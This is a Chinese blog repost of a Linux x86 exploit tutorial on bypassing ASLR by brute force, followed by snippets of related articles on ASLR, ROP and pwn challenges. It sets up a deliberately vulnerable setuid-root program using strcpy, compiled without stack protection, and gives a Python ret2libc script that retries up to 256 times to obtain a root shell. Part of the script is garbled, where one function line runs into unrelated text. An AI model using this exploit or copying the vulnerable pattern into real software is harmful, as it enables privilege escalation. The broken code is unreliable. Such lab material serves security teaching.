实验七、绕过ASLR ---- 第二部分

最新推荐文章于 2024-04-09 14:39:14 发布
最新推荐文章于 2024-04-09 14:39:14 发布
阅读量346 收藏
点赞数
原文链接:http://www.cnblogs.com/zoey-/p/10956029.html
版权

7.1 实验环境

VM 配置:Ubuntu 12.04 (x86) 

7.2 实验原理

什么是爆破?

使用爆破技巧,来绕过共享库地址随机化。

7.3 实验过程

7.3.1 漏洞代码

//vuln.c
#include <stdio.h>
#include <string.h>
int main(int argc, char* argv[]) {
    char buf[256];
    strcpy(buf, argv[1]);
    printf("%s\n", buf);
    fflush(stdout);
    return 0;
}

7.3.2 编译程序

ASLR 要为开启状态。

#sudo sh -c "echo 2 > /proc/sys/kernel/randomize_va_space"
gcc -g -fno-stack-protector -o vuln vuln.c
sudo chown root vuln
sudo chgrp root vuln
sudo chmod +s vuln

使用 ldd 命令可以看到在 ASLR 开启的情况下,每次 glibc 的基址是随机的:

但是,我们可以发现其中的相同点,也就是说,libc 的随机化只能反映在 2 个十六进制位(即 8 个二进制位上),因此我们可以通过最多 次尝试,命中它的真实地址,从而获得 root shell。

7.3.3 进行攻击

 攻击代码如下:

#exp.py 
#!/usr/bin/env python 
import struct 
from subprocess import call
libc_base_addr = 0xb7595000 
exit_off = 0x00032be0         
system_off = 0x0003f060                            
system_addr = libc_base_addr + system_off 
exit_addr = libc_base_addr    + exit_off 
system_arg = 0x804827d
def conv(num):    
return struct.pack ( "<I" , numystem + exit + system_arg 
buf = "A" * 268 
buf += conv(system_addr) 
buf += conv(exit_addr) 
buf += conv(system_arg)
print "Calling vulnerable program"  
i = 0 
while     ( i < 256 ) :    
print    "Number of tries : %d " % i    
i += 1    
ret = call ( [ "./vuln" , buf ] )    
if ( not ret ) :        
break    
else :        
print " Exploit failed "

执行结果:

共会产生255个输出,进行部分截取:

 

转载于:https://www.cnblogs.com/zoey-/p/10956029.html

weixin_30788239
关注
iOS - 启动优化之Clang插桩实现二进制重排
AAjjx的博客
05-26 1918
####请大家认真看完 前言 自从抖音团队分享了这篇 抖音研发实践:基于二进制文件重排的解决方案 APP启动速度提升超15% 启动优化文章后 , 二进制重排优化 pre-main 阶段的启动时间自此被大家广为流传 . 本篇文章首先讲述下二进制重排的原理 , ( 因为抖音团队在上述文章中原理部分大多是点到即止 , 多数朋友看完并没有什么实际收获 ) . 然后将结合 clang 插桩的方式 来实际讲述和演练一下如何解决抖音团队遗留下来的这一问题 : hook Objc_msgSend 无法解决的 纯s
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 1241
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
Linux (x86) Exploit 开发系列教程之 绕过 ASLR -- 第二部分
龙哥盟
05-01 4万+
绕过 ASLR第二部分 译者:飞龙 原文:Bypassing ASLR – Part II 本文承接 @hackyzh 翻译的第六篇。 预备条件:经典的基于栈的溢出VM 配置:Ubuntu 12.04 (x86)这篇文章中,让我们看看如何使用爆破技巧,来绕过共享库地址随机化。 什么是爆破? 在这个技巧中,攻击者选择特定的 Libc 机制,并持续攻击程序直到成功。假设
Linux Exploit系列之 绕过 ASLR -- 第二部分
weixin_30679823的博客
05-05 163
原文地址:https://github.com/wizardforcel/sploitfun-linux-x86-exp-tut-zh/blob/master/7.md 这一节是简单暴力的一节,作者讲的很清楚,有些坑我在之前的说明中也已经说过了。这次说一个坑,我调了很久,不一定每个人都会遇到。 TypeError: execv() arg 2 must contain only strings...
ASLR/DEP绕过技术概览
Walter的专栏
09-12 4933
ASLR/DEP绕过技术概览 by WinsOn@Cybersword      在经典的栈溢出模型中,通过覆盖函数的返回地址来达到控制程序执行流程(EIP寄存器),通常将返回地址覆盖为0x7FFA4512,这个地址是一条JMP ESP指令,在函数返回时就会跳转到这个地址去执行,也就是执行JMP ESP,而此时ESP刚好指向我们在栈上布置的Shellcode,于是就执行了Shellcode。
Linux (x86) Exploit 开发系列教程之八 绕过 ASLR -- 第三部分
热门推荐
龙哥盟
05-01 4万+
绕过 ASLR – 第三部分 译者:飞龙 原文:Bypassing ASLR – Part III 预备条件: 经典的基于栈的溢出 绕过 ASLR – 第一部分 VM 配置:Ubuntu 12.04 (x86)在这篇文章中,让我们看看如何使用 GOT 覆盖和解引用技巧。来绕过共享库地址随机化。我们在第一部分中提到过,即使可执行文件没有所需的 PLT 桩代码,攻击者也可以使用 GOT 覆盖和解引用技巧
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
01-27
Canary机制是一种安全防御技术,主要用来防止栈溢出攻击。在32位系统中,栈溢出漏洞...最后,实验验证了输入`whoami`命令时,如果成功绕过Canary,将返回root用户,这意味着攻击者已获得交互式的shell,实验目标达成。
从零开始学习软件漏洞挖掘系列教程第六篇:进击ASLR地址随机化1
08-03
实验分为两部分:一是了解常见的绕过ASLR策略,二是选择一种技术进行实战演示。其中,两种常见的绕过ASLR的方法包括: 1. 使用不受ASLR保护的模块地址:某些模块可能未启用ASLR,如静态链接的库或自定义的二进制...
buflab-handout, csapp lab3
12-23
【标题】"buflab-...实验还可能涉及使用诸如ASLR(地址空间布局随机化)、DEP(数据执行保护)等安全机制,以及如何绕过这些防护措施。总的来说,这是一个全面而深入的实践,旨在提升学生的系统级安全意识和技能。
论文研究-ASLR技术研究及其在抵御缓冲区溢出攻击中的性能分析 .pdf
08-16
ASLR技术研究及其在抵御缓冲区溢出攻击中的性能分析,郭慎平,陈明俊,缓冲区溢出漏洞是互联网和计算机系统中最普遍也是威胁最大的安全漏洞。地址空间布局随机化技术(ASLR)是近年来出现的一种防御缓冲区
栈溢出学习(五)之NX,ASLR绕过方法
Pz_mstr's Blog
03-29 3863
前言 栈溢出学习(五)之NX,ASLR绕过方法,讲述NX,ASLR保护机制及其绕过方法 系列文章 栈溢出学习(一)之利用预留后门 & return2shellcode 栈溢出学习(二)之 jmp esp & return2libc 栈溢出学习(三)之简单ROP 栈溢出学习(四)之Hijack GOT 本文属于新手实验难度,过程比较详细,适合新手学习 样例代码 本文使用的代码如下...
跳过ASLR:攻击分支预测来旁路ASLR
forevertingting的博客
04-03 1328
Jump Over ASLR:Attacking Branch Predictors to Bypass ASLR 摘要 Address space layout randomization(ASLR)是一被广泛采用防止攻击的技术。ASLR技术通过随机化关键程序段偏移,使得攻击者无法获得特定代码目标地址,从而无法重定向控制流到此代码。在本文中,我们开发了一个利用分支目标缓冲器(BTB)的侧...
aslr oracle,Linux (x86) Exploit 开发系列教程之八 绕过 ASLR -- 第三部分
weixin_42318812的博客
04-13 241
绕过 ASLR – 第三部分预备条件:VM 配置:Ubuntu 12.04 (x86)在这篇文章中,让我们看看如何使用 GOT 覆盖和解引用技巧。来绕过共享库地址随机化。我们在第一部分中提到过,即使可执行文件没有所需的 PLT 桩代码,攻击者也可以使用 GOT 覆盖和解引用技巧来绕过 ASLR。漏洞代码:// vuln.c#include #include #include int main (i...
内存保护机制及绕过方法——通过覆盖部分地址绕过ASLR
weixin_30873847的博客
05-16 643
ASLR保护机制 ASLR简介 微软在Windows Vista、2008 server、Windows 7、Windows 8等系统的发布中, 开始将ASLR作为内置的系统保护机制运行, 将系统映像的基址设置到1/256的random slot上, 同时将各个线程的堆栈和堆进行随机化。这需要程序和系统的双重支持, 但是程序的支持并不是一定的。可以使用如下注册表选项来使用或禁用 ASLR ...
[BUUCTF]PWN——[Black Watch 入群题]PWN
mcmuyanga的博客
10-26 2517
[Black Watch 入群题]PWN——栈劫持 入群题密码在 /password.txt Ubuntu 16 2020年02月27日:此入群题已作废,请看新版入群题。 附件 解题步骤: 例行检查,32位程序,开启了nx保护 运行一下程序,两次输入,测试时发现输入长度过长,会报错 32位ida载入,首先shift+f12查看一下程序里的字符串,没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 从main函数开始看程序
Windows下的ASLR保护机制详解及其绕过
最新发布
WdIg-2023的博客
04-09 1186
我们前面已经详细介绍过GS,SafeSEH,和DEP保护机制,大家想一想,如果没有开启任何保护,如果程序存在漏洞我们是不是很容易攻击成功?就算开了前面已经介绍过的保护,我们也有很容易的方法突破这些保护,进而完成攻击。那么我们再次站在开发者的角度,我们如何制定一种保护机制,从而让攻击很难完成呢?
Linux Exploit系列之六 绕过ASLR - 第一部分
weixin_30377461的博客
05-05 176
绕过ASLR - 第一部分 什么是 ASLR? 地址空间布局随机化(ASLR)是随机化的利用缓解技术: 堆栈地址 堆地址 共享库地址 一旦上述地址被随机化,特别是当共享库地址被随机化时,我们采取的绕过NX bit的方法不会生效,因为攻击者需要知道libc基地址。但这种缓解技术并不完全是万无一失的,因此在这篇文章中我们可以看到如何绕过共享库地址随...
[pwn]ROP:绕过ASLR&NX
Breeze的博客
05-27 1万+
# [详细] ROP:绕过ASLR&NX 这次使用的程序是Defcon - 2015初赛题目,r0pbaby,也是一道经典的pwn题目了。 NX策略是指在栈中的代码不会被执行,ASLR是使共享库的装载位置随机化不可预测。 信息搜集 首先查看是64位还是32位文件: 然后查看安全策略: 可见开启了NX和PIE,PIE也就是ASLR。然后在IDA中查看伪代码,无需详细阅读,直接找溢出函数即...
Intel® 64 and IA-32 Architectures System Programming Guide, Part 2
"Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3B,系统编程指南第二部分" Intel® 64和IA-32架构软件开发人员手册是针对Intel处理器架构的全面参考资料,由五卷组成。这五卷包括:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值